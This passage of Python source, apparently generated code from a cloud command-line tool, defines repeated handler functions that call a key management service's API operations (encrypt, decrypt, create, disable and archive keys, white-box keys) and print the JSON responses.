rsp = client.Encrypt(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableWhiteBoxKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableWhiteBoxKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.EnableWhiteBoxKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUpdateAlias(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UpdateAliasRequest()
model.from_json_string(json.dumps(args))
rsp = client.UpdateAlias(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteWhiteBoxKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteWhiteBoxKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteWhiteBoxKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportKeyMaterial(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ImportKeyMaterialRequest()
model.from_json_string(json.dumps(args))
rsp = client.ImportKeyMaterial(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetPublicKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetPublicKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.GetPublicKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisableKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGenerateDataKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GenerateDataKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.GenerateDataKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAsymmetricSm2Decrypt(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AsymmetricSm2DecryptRequest()
model.from_json_string(json.dumps(args))
rsp = client.AsymmetricSm2Decrypt(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSignByAsymmetricKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SignByAsymmetricKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.SignByAsymmetricKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCancelKeyDeletion(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CancelKeyDeletionRequest()
model.from_json_string(json.dumps(args))
rsp = client.CancelKeyDeletion(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetKeyRotationStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetKeyRotationStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.GetKeyRotationStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxKeyDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWhiteBoxKeyDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWhiteBoxKeyDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBindCloudResource(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BindCloudResourceRequest()
model.from_json_string(json.dumps(args))
rsp = client.BindCloudResource(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisableKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doArchiveKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ArchiveKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.ArchiveKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetServiceStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetServiceStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.GetServiceStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEncryptByWhiteBox(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EncryptByWhiteBoxRequest()
model.from_json_string(json.dumps(args))
rsp = client.EncryptByWhiteBox(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListAlgorithms(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ListAlgorithmsRequest()
model.from_json_string(json.dumps(args))
rsp = client.ListAlgorithms(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReEncrypt(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ReEncryptRequest()
model.from_json_string(json.dumps(args))
rsp = client.ReEncrypt(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ListKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.ListKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGenerateRandom(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GenerateRandomRequest()
model.from_json_string(json.dumps(args))
rsp = client.GenerateRandom(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doOverwriteWhiteBoxDeviceFingerprints(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.OverwriteWhiteBoxDeviceFingerprintsRequest()
model.from_json_string(json.dumps(args))
rsp = client.OverwriteWhiteBoxDeviceFingerprints(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWhiteBoxKey(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWhiteBoxKeyRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWhiteBoxKey(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetParametersForImport(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetParametersForImportRequest()
model.from_json_string(json.dumps(args))
rsp = client.GetParametersForImport(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableWhiteBoxKeys(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableWhiteBoxKeysRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisableWhiteBoxKeys(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doListKeyDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ListKeyDetailRequest()
model.from_json_string(json.dumps(args))
rsp = client.ListKeyDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAsymmetricRsaDecrypt(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
